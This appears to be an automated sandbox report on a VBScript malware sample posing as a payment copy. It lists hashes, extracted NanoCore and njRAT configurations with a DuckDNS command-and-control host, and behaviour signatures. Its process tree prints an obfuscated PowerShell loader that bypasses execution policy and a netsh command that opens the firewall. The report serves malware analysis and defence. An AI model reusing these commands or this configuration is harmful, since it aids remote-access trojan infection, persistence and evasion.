Overview

overview

10

Static

static

N2K18_Paym...py.vbs

windows7_x64

3

N2K18_Paym...py.vbs

windows10_x64

10

Analysis

  • max time kernel
    153s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10-en-20211014
  • submitted
    18-11-2021 19:18

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    N2K18_Payment_Copy.vbs

  • Size

    2KB

  • MD5

    76d64bdec97716fc5db19bf4d9fd3255

  • SHA1

    35f62e6cc17c8bc982db07c556216d98fd600c02

  • SHA256

    8d8c15469072ede8e80eb85c7f3ef44ba53778831c28dab5a6562a0672b1bc72

  • SHA512

    d38a1e31a96267bb7706b4e072c6c383bb26eb2e065b0b6e5b6c178ac87cc0115d2a2f88ec5ab71a93364197e1eefff0e3c3cb87a50b636607e2026b962c90f9

Score
10/10
nanocorenjrathackedevasionkeyloggerpersistencespywarestealertrojan

Malware Config

Extracted

Family

nanocore

Version

1.2.2.0

C2

jamcav.duckdns.org:6746

Mutex

9bb8b571-1a08-4fb2-8447-a1da0968f2fa

Attributes
  • activate_away_mode

    true

  • backup_connection_host

    jamcav.duckdns.org

  • backup_dns_server

    8.8.4.4

  • buffer_size

    65535

  • build_time

    2021-08-20T15:54:30.577245636Z

  • bypass_user_account_control

    true

  • bypass_user_account_control_data

  • clear_access_control

    true

  • clear_zone_identifier

    false

  • connect_delay

    4000

  • connection_port

    6746

  • default_group

    jam

  • enable_debug_mode

    true

  • gc_threshold

    1.048576e+07

  • keep_alive_timeout

    30000

  • keyboard_logging

    false

  • lan_timeout

    2500

  • max_packet_size

    1.048576e+07

  • mutex

    9bb8b571-1a08-4fb2-8447-a1da0968f2fa

  • mutex_timeout

    5000

  • prevent_system_sleep

    false

  • primary_connection_host

    jamcav.duckdns.org

  • primary_dns_server

    8.8.8.8

  • request_elevation

    true

  • restart_delay

    5000

  • run_delay

    0

  • run_on_startup

    true

  • set_critical_process

    true

  • timeout_interval

    5000

  • use_custom_dns_server

    false

  • version

    1.2.2.0

  • wan_timeout

    8000

Extracted

Family

njrat

Version

1.9

Botnet

HacKed

Mutex

Microsoft.Exe

Attributes
  • reg_key

    Microsoft.Exe

Signatures

  • NanoCore

    NanoCore is a remote access tool (RAT) with a variety of capabilities.

    keyloggertrojanstealerspywarenanocore
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • Blocklisted process makes network request 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 23 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 14 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 46 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\N2K18_Payment_Copy.vbs"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2516
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $cc = 'by------------s'.Replace('------------','pas');$bb = '-ex++++++++++++++++icy'.Replace('++++++++++++++++','ecutionpol');$aa = '-no--------------le'.Replace('--------------','profi');$dd = 'C:\Us<<<<<<<<<>>>>>>>>>ar.ps1'.Replace('<<<<<<<<<>>>>>>>>>','ers\Public\Downloads\HB');$Run = 'Powers-----------------dd'.Replace('-----------------','hell $aa $bb $cc -file $');($Run -Join '')|&('I'+'eX')
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:3068
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -executionpolicy bypass -file C:\Users\Public\Downloads\HBar.ps1
        3⤵
        • Blocklisted process makes network request
        • Suspicious use of SetThreadContext
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:524
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
          4⤵
            PID:1248
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
            4⤵
              PID:1448
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
              4⤵
                PID:956
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                4⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious behavior: GetForegroundWindowSpam
                • Suspicious use of AdjustPrivilegeToken
                PID:4024
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                4⤵
                  PID:2508
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                  4⤵
                  • Suspicious use of FindShellTrayWindow
                  • Suspicious use of WriteProcessMemory
                  PID:2328
                  • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
                    "C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe"
                    5⤵
                    • Executes dropped EXE
                    PID:2968
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"
                  4⤵
                  • Adds Run key to start application
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:972
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe" "jsc.exe" ENABLE
                    5⤵
                      PID:1876

            Network

            MITRE ATT&CK Matrix ATT&CK v6

            Initial Access

            Execution

            Persistence

            Modify Existing Service

            1
            T1031

            Registry Run Keys / Startup Folder

            1
            T1060

            Privilege Escalation

            Defense Evasion

            Modify Registry

            1
            T1112

            Credential Access

            Discovery

            System Information Discovery

            1
            T1082

            Lateral Movement

            Collection

            Exfiltration

            Command and Control

            Impact

            Replay Monitor

            Loading Replay Monitor...

            Downloads

            • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
              MD5

              ea6243fdb2bfcca2211884b0a21a0afc

              SHA1

              2eee5232ca6acc33c3e7de03900e890f4adf0f2f

              SHA256

              5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

              SHA512

              189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

              Download Submit
            • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
              MD5

              c3563fdebacc45cb24cdce8971e119e4

              SHA1

              902be9a12340953ffe25296db00c19ade53af25c

              SHA256

              ef996c1e346d5f785ed4d1d9c8f6bd889051ca256bbdca8baaf616110b9cde54

              SHA512

              f1ea0aa15d5ab941fc50a64da113b60a413e36d85761d4d6c7c1c99505bd9ce9d74c892b0fed18a170d1965fedc2da2eb756a4a49b95301c3d7398ab9ba9aa61

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
              MD5

              f1feead2143c07ca411d82a29fa964af

              SHA1

              2198e7bf402773757bb2a25311ffd2644e5a1645

              SHA256

              8f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1

              SHA512

              e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df

              Download Submit
            • C:\Users\Admin\AppData\Local\Temp\GoogleCrashHandler.exe
              MD5

              f1feead2143c07ca411d82a29fa964af

              SHA1

              2198e7bf402773757bb2a25311ffd2644e5a1645

              SHA256

              8f2800ac8af72e8038e146b3988a30651952f20ed6cdf7be3ae4709fbb026af1

              SHA512

              e7e2266ec862a793da7cea01c926b7a874453cf2efb0b4b77776c26042dc2ded74f17c390fad97bd2d8c0c4971a1b9d9e6c705a13edbc9e48570922e5e6cc9df

              Download Submit
            • C:\Users\Public\Downloads\HBar.ps1
              MD5

              b1da375f7fc47b6e7f441a44b1925371

              SHA1

              336132bf0096ad8fa877cf25978e9bb2b911554e

              SHA256

              51b7e07f22110272589c03f523256f454274605cc41ed5847448b9c0bf62e4bd

              SHA512

              d9861c341b1ae91647d51053b93291ca5862de418a5a42ac56c765e19abb7cf9f5c29bc6e72c1789c3921481f13a0498c1d329dbc68a39c8d8db5b59652f7248

              Download Submit
            • memory/524-166-0x00000268396F0000-0x00000268396F4000-memory.dmp
              Filesize

              16KB

              Download
            • memory/524-145-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-151-0x00000268377A3000-0x00000268377A5000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-149-0x00000268377A0000-0x00000268377A2000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-150-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-141-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-146-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-155-0x00000268377A6000-0x00000268377A8000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-144-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-143-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-136-0x0000000000000000-mapping.dmp
              Download
            • memory/524-137-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-138-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-139-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/524-140-0x0000026837790000-0x0000026837792000-memory.dmp
              Filesize

              8KB

              Download
            • memory/972-191-0x0000000000400000-0x0000000000410000-memory.dmp
              Filesize

              64KB

              Download
            • memory/972-216-0x0000000005830000-0x0000000005D2E000-memory.dmp
              Filesize

              5.0MB

              Download
            • memory/972-192-0x000000000040BBCE-mapping.dmp
              Download
            • memory/1876-215-0x0000000000000000-mapping.dmp
              Download
            • memory/2328-178-0x0000000000400000-0x0000000000418000-memory.dmp
              Filesize

              96KB

              Download
            • memory/2328-204-0x00000000053A0000-0x000000000589E000-memory.dmp
              Filesize

              5.0MB

              Download
            • memory/2328-186-0x0000000005300000-0x0000000005301000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2328-185-0x0000000005260000-0x0000000005261000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2328-179-0x00000000004123BE-mapping.dmp
              Download
            • memory/2968-211-0x000000007E8A0000-0x000000007E8A1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/2968-206-0x0000000000000000-mapping.dmp
              Download
            • memory/3068-125-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-201-0x000001EF2FEF6000-0x000001EF2FEF8000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-131-0x000001EF2FEF3000-0x000001EF2FEF5000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-123-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-124-0x000001EF2FF30000-0x000001EF2FF31000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3068-130-0x000001EF2FEF0000-0x000001EF2FEF2000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-132-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-118-0x0000000000000000-mapping.dmp
              Download
            • memory/3068-126-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-122-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-121-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-129-0x000001EF4A510000-0x000001EF4A511000-memory.dmp
              Filesize

              4KB

              Download
            • memory/3068-120-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-127-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-128-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/3068-119-0x000001EF2E470000-0x000001EF2E472000-memory.dmp
              Filesize

              8KB

              Download
            • memory/4024-205-0x00000000054C0000-0x00000000059BE000-memory.dmp
              Filesize

              5.0MB

              Download
            • memory/4024-174-0x000000000041E792-mapping.dmp
              Download
            • memory/4024-214-0x00000000054C0000-0x00000000059BE000-memory.dmp
              Filesize

              5.0MB

              Download
            • memory/4024-184-0x00000000059C0000-0x00000000059C1000-memory.dmp
              Filesize

              4KB

              Download
            • memory/4024-173-0x0000000000400000-0x0000000000438000-memory.dmp
              Filesize

              224KB

              Download